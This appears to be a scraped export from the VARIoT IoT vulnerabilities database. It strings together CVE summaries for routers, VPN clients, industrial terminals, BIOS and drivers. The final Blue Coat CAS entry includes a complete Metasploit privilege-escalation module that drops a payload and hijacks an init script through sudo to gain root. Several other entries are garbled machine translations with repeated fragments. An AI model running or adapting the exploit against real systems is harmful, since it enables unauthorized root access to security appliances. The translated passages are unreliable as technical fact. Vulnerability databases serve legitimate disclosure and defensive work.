VARIoT IoT vulnerabilities database

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2016. Notes: none. FortiOS Used in Fortinet FortiClient SSL_VPN Linux The version contains a vulnerability that allows elevation of privilege.By the attacker, subproc Through the file root You may get permission. FortiClient SSLVPN is prone to a privilege-escalation vulnerability. An attacker can exploit this issue to gain root privileges. FortiClient SSLVPN for Linux available with FortiOS prior to 5.4.3 are vulnerable

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2016. Notes: none. Fortinet FortiClient SSLVPN is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of affected application. Failed attempts may lead to denial-of-service conditions. Versions prior to FortiClient SSLVPN with FortiOS 5.4.3 are vulnerable. Fortinet FortiClient SSL_VPN for Linux is a Linux-based VPN client from Fortinet for connecting to Fortinet devices. A security vulnerability exists in Fortinet FortiClient SSL_VPN for Linux. An attacker could use the FortiClient log file to exploit this vulnerability to overwrite arbitrary files

Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability. Technicolor ( Old Cisco) DPC3928SL There is an access control vulnerability in the firmware. In addition, GitHub Repository string-bleed/StringBleed-CVE-2017-5135 Is 2017 Year 4 Moon 27 Not valid as of the day. It may contain trojan code that exploits this vulnerability.Information may be obtained and information may be altered. Technicolor DPC3928SL is prone to an authentication-bypass vulnerability. Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. Technicolor DPC3928SL is a cable modem from the French Technicolor Group. A remote attacker could exploit this vulnerability to bypass access controls and execute code

A Hard-Coded Passwords issue was discovered in Marel Food Processing Systems M3000 terminal associated with the following systems: A320, A325, A371, A520 Master, A520 Slave, A530, A542, A571, Check Bin Grader, FlowlineQC T376, IPM3 Dual Cam v132, IPM3 Dual Cam v139, IPM3 Single Cam v132, P520, P574, SensorX13 QC flow line, SensorX23 QC Master, SensorX23 QC Slave, Speed Batcher, T374, T377, V36, V36B, and V36C; M3210 terminal associated with the same systems as the M3000 terminal identified above; M3000 desktop software associated with the same systems as the M3000 terminal identified above; MAC4 controller associated with the same systems as the M3000 terminal identified above; SensorX23 X-ray machine; SensorX25 X-ray machine; and MWS2 weighing system. The end user does not have the ability to change system passwords. plural Marel Food Processing System The product firmware contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MarelSensorX25X-rayMachine and others are products of the medical industry of Iceland Marel that provide various medical tests. A security bypass vulnerability exists in several Marel products that originated from the use of hard-coded certificates by programs. A remote attacker could exploit the vulnerability to gain unauthorized access to the affected device. Marel Food Processing Systems are prone to following security vulnerabilities: 1. A security-bypass vulnerability. 2. An arbitrary file-upload vulnerability. Marel SensorX25 X-ray Machine, etc

An Unrestricted Upload issue was discovered in Marel Food Processing Systems M3000 terminal associated with the following systems: A320, A325, A371, A520 Master, A520 Slave, A530, A542, A571, Check Bin Grader, FlowlineQC T376, IPM3 Dual Cam v132, IPM3 Dual Cam v139, IPM3 Single Cam v132, P520, P574, SensorX13 QC flow line, SensorX23 QC Master, SensorX23 QC Slave, Speed Batcher, T374, T377, V36, V36B, and V36C; M3210 terminal associated with the same systems as the M3000 terminal identified above; M3000 desktop software associated with the same systems as the M3000 terminal identified above; MAC4 controller associated with the same systems as the M3000 terminal identified above; SensorX23 X-ray machine; SensorX25 X-ray machine; and MWS2 weighing system. This vulnerability allows an attacker to modify the operation and upload firmware changes without detection. plural Marel Food Processing System The product firmware contains a vulnerability related to the unlimited uploading of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MarelSensorX25X-rayMachine and others are products of the medical industry of Iceland Marel that provide various medical tests. There are arbitrary file upload vulnerabilities in MarelFoodProcessingSystems in several Marel products. Marel Food Processing Systems are prone to following security vulnerabilities: 1. A security-bypass vulnerability. 2. Marel SensorX25 X-ray Machine, etc

D-Link DIR-615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated, as demonstrated by changing the Security option from WPA2 to None, or changing the hiddenSSID parameter, SSID parameter, or a security-option password. D-Link DIR-615 T1 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. D-LinkDIR615 is a wireless router product from D-Link. A remote attacker could use this vulnerability to send a specially crafted request to exploit the vulnerability to change the administrator password and network policy

A vulnerability with IPv6 UDP ingress packet processing in Cisco Wireless LAN Controller (WLC) Software could allow an unauthenticated, remote attacker to cause an unexpected reload of the device. The vulnerability is due to incomplete IPv6 UDP header validation. An attacker could exploit this vulnerability by sending a crafted IPv6 UDP packet to a specific port on the targeted device. An exploit could allow the attacker to impact the availability of the device as it could unexpectedly reload. This vulnerability affects Cisco Wireless LAN Controller (WLC) running software version 8.2.121.0 or 8.3.102.0. Cisco Bug IDs: CSCva98592. Vendors have confirmed this vulnerability Bug ID CSCva98592 It is released as.Service operation interruption (DoS) An attack may be carried out. The Cisco WLC is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. Attackers can exploit this issue to cause denial-of-service conditions

The Apple Music (aka com.apple.android.music) application before 2.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. Apple Music for Android is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Versions prior to Apple Music 2.0 running on Android version 4.3 and later are vulnerable. The vulnerability stems from the fact that the program does not verify the X.509 certificate on the SSL server side. Impact An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently. Timeline August 5, 2016 - Notified Apple via product-security@apple.com August 5, 2016 - Apple sent an auto acknowledgment August 16, 2016 - Apple responded stating that they are investigating October 5, 2016 - Apple confirmed the vulnerability January 18, 2017 - Asked for a status update January 20, 2017 - Apple responded stating that they are still working on the issue April 4, 2017 - Apple released version 2.0.0 which resolves this vulnerability Solution Upgrade to version 2.0.0 or later https://support.apple.com/en-us/HT207605 https://support.apple.com/en-us/HT201222 CVE-ID: CVE-2017-2387 . This issue was addressed through improved certificate validation. CVE-2017-2387: David Coomber of Info-Sec.CA Installation note: Apple Music 2.0 for Android may be obtained from Google Play. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org iQIcBAEBCgAGBQJY495eAAoJEIOj74w0bLRGVxwP/RCoUs/5c4PWbLKKMSIRqn/0 CQXJJsFW4IhR2ve9fyokQiYNNNRXkbz2hIj/veuv4mHfo9cq5iN4qdbktBQIiuCJ V3emDwGO8+thvJUJXZ5AMBz8lX0zEvqN1k2yIyk7lzqQQOzx0hIJASWX0B2oBB95 IsjbUmybVwRCL32Sn86RW9lVisfcchjwRMbYtoBORLqjLJOuQnTQzc91VdeSO4o/ pg0Am9OcumlhkeiEpu/RXBgnb7x7bx/KdFfQYEVDiyWmCxYJkDI96SDYuvu037f1 ZRL0hmmfgtMDjitVF2vAailMQkJ+JRaIkK/YW5sAUY+p6OdwRnOx+0ZQbrMfTFrK x8EdAo8v84HsEFToz7nRXy9tF3CLumWuSaOy6nJ7UKnFR6nXqqqXI6z7+M+HGcpY UVyspkBm9kYjLFz798tLCIUOdtIgURMkBTDIzrsAixaxDbUUrfgOxBwohh8gTE5X 1rucHpi5fK15SkCBndbRa2sDGnmNKP9MT0OL8DkRwQ06Owr5rn66emVc1vP26jK/ vvFwW5xRTdfXSTB5iU3QWwcDIlWu8D6sfMQAaPt1lSg0luvIUlAQGSiIfF92grOo PQfsZ8zUu1ghDefKxy7DfhUAlfjabM3c00p9mqjroFyQO//QiMnogGDDhC3oQx9V uOCp21cCIHCLiYFyhV2y =eJ3o -----END PGP SIGNATURE-----

Privilege escalation in IntelHAXM.sys driver in the Intel Hardware Accelerated Execution Manager before version 6.0.6 allows a local user to gain system level access. Local attackers can exploit this issue to gain system level access

An unauthenticated XSS vulnerability with FortiMail 5.0.0 - 5.2.9 and 5.3.0 - 5.3.8 could allow an attacker to execute arbitrary scripts in the security context of the browser of a victim logged in FortiMail, assuming the victim is social engineered into clicking an URL crafted by the attacker. Fortinet FortiMail is prone to a unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiMail 5.0.0 through 5.2.9 and 5.3.0 through 5.3.8 are vulnerable. Fortinet FortiMail is an email information security device from Fortinet, which provides information filtering engine, anti-spam and threat defense functions

An elevation of privilege vulnerability in the NVIDIA boot and power management processor driver could enable a local malicious application to execute arbitrary code within the context of the boot and power management processor. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel 3.18. Android ID:A-34115304. References: N-CVE-2017-0329. This vulnerability Android ID: A-34115304 and NVIDIA N-CVE-2017-0329 It is published asInformation is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. GooglePixelC is a tablet. NVIDIA GPUdriver is one of the NVIDIA graphics processor driver components used in it. GooglePixelC has a privilege escalation vulnerability that allows an attacker to exploit a vulnerability for privilege escalation. Google Pixel C is prone to a privilege-escalation vulnerability. Attackers can exploit this issue to execute arbitrary code with elevated privileges within the context of the process. This issue is being tracked by Android Bug ID A-34115304

The BIOS in Intel Compute Stick systems based on 6th Gen Intel Core processors prior to version CC047 may allow an attacker with physical access to the system to gain access to personal information. IntelNUC is Intel's micro PC, which is equivalent to a small desktop, allowing you to work, study and play in any room. A local information disclosure vulnerability exists in IntelNUC and ComputeStickDCI. Intel NUC and Compute Stick are prone to multiple local information-disclosure vulnerabilities. Note: This issue was previously titled 'Intel NUC and Compute Stick DCI CVE-2017-5685 Local Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the vulnerability impact. BIOS is one of the basic input input systems

The BIOS in Intel NUC systems based on 6th Gen Intel Core processors prior to version KY0045 may allow may allow an attacker with physical access to the system to gain access to personal information. IntelNUC is Intel's micro PC, which is equivalent to a small desktop, allowing you to work, study and play in any room. A local information disclosure vulnerability exists in IntelNUC and ComputeStickDCI. Intel NUC and Compute Stick are prone to multiple local information-disclosure vulnerabilities. Note: This issue was previously titled 'Intel NUC and Compute Stick DCI CVE-2017-5685 Local Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the vulnerability impact. BIOS is one of the basic input input systems

The BIOS in Intel NUC systems based on 6th Gen Intel Core processors prior to version SY0059 may allow may allow an attacker with physical access to the system to gain access to personal information. IntelNUC is a micro PC from Intel Corporation. IntelNUC has a local information disclosure vulnerability. Intel NUC and Compute Stick are prone to multiple local information-disclosure vulnerabilities. Note: This issue was previously titled 'Intel NUC and Compute Stick DCI CVE-2017-5685 Local Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the vulnerability impact. BIOS is one of the basic input input systems

Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to execute arbitrary commands via shell metacharacters to certain /goform/* pages. Air: Link3G, Air: Link5000AC, Air: Link59300 is the router of the Norwegian Jensenof Scandinavia company. There are a number of JensenofScandinaviaAir:Link product/goform/* pages with command execution vulnerabilities. are all routers of Jensen of Scandinavia AS in Norway. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev

Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct CSRF attacks via certain /goform/* pages. Jensen of Scandinavia AS Air:Link 3G (AL3G) , Air:Link 5000AC (AL5000AC) and Air:Link 59300 (AL59300) The device contains a cross-site request forgery vulnerability.By a remote attacker /goform/* A cross-site request forgery attack may be performed via the page. Air: Link3G, Air: Link5000AC, Air: Link59300 is the router of the Norwegian Jensenof Scandinavia company. Allows remote attackers to build malicious URIs, entice users to resolve, and perform malicious actions in the context of the target user. are all routers of Jensen of Scandinavia AS in Norway. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev

Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to read passwords via a direct request to the x.asp page. Air: Link3G, Air: Link5000AC, Air: Link59300 is the router of the Norwegian Jensenof Scandinavia company. A number of JensenofScandinaviaAir:Link products have information disclosure vulnerabilities. are all routers of Jensen of Scandinavia AS in Norway. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev

Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the submit-url parameter to certain /goform/* pages. Air: Link3G, Air: Link5000AC, Air: Link59300 is the router of the Norwegian Jensenof Scandinavia company. An attacker can construct a malicious URI, entice the user to resolve, and redirect the user to any WEB site for phishing attacks. are all routers of Jensen of Scandinavia AS in Norway. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev

Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the return-url parameter to /goform/formLogout. Air: Link3G, Air: Link5000AC, Air: Link59300 is the router of the Norwegian Jensenof Scandinavia company. An attacker can construct a malicious URI, entice the user to resolve, and redirect the user to any WEB site for phishing attacks. are all routers of Jensen of Scandinavia AS in Norway. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev

Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. BlueCoatAdvancedSecureGateway (ASG) and ContentAnalysisSystem (CAS) are products of BlueCoatSystems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Bluecoat Products are prone to command-injection vulnerability because it fails to properly sanitize user-supplied input. This may aid in further attacks. The following products are affected: Advanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. Content Analysis System 1.3 prior to 1.3.7.4 is vulnerable. # Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS # Date: April 3, 2017 # Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd # Contact: chrisdhebert[at]gmail.com # Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138 # Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable # Tested on: BlueCoat CAS 1.3.7.1 # CVE : cve-2016-9091 Timeline: -------- 08/31/2016 (Vulnerablities Discovered) 03/31/2017 (Final Vendor Patch Confirmed) 04/03/2017 (Public Release) Description: The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. Proof of Concept: Metasploit Module - root priv escalation (via mvtroubleshooting.sh) ----------------- ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class Metasploit4 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::Local::Linux def initialize(info={}) super( update_info( info, { 'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)', 'Description' => %q{ This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate privileges. In order to work, a tomcat session with access to sudo on the sudoers is needed. This module is useful for post exploitation of BlueCoat vulnerabilities, where typically web server privileges are acquired, and this user is allowed to execute sudo on the sudoers file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Hebert <chrisdhebert[at]gmail.com>', 'Pete Paccione <petepaccione[at]gmail.com>', 'Corey Boyd <corey.k.boyd[at]gmail.com>' ], 'DisclosureDate' => 'Vendor Contacted 8-31-2016', 'References' => [ ['EDB', '##TBD##'], ['CVE', '2016-9091' ], ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138'] ], 'Platform' => %w{ linux unix }, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ] ], 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, 'DefaultTarget' => 0, } )) register_options([ OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]), ], self.class) end def check id=cmd_exec("id -un") if id!="tomcat" print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat") fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat") end clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3") if clprelease!="1.3.7.1" print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1") fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1") end return Exploit::CheckCode::Vulnerable end def exploit print_status("#{peer} - Checking for vulnerable BlueCoat session...") if check != CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1") end print_status("#{peer} - Running Exploit...") exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf" write_file(exe_file, generate_payload_exe) cmd_exec "chmod +x #{exe_file}" begin #Backup original nscd init script cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$ #Replaces /etc/init.d/nscd script with meterpreter payload cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$ #Executes meterpreter payload as root cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh" #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1) ensure #Restores original nscd init script cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$ #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it) cmd_exec "/bin/rm -f #{exe_file}" end print_status("#{peer} - The exploit module has finished") #Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out. end end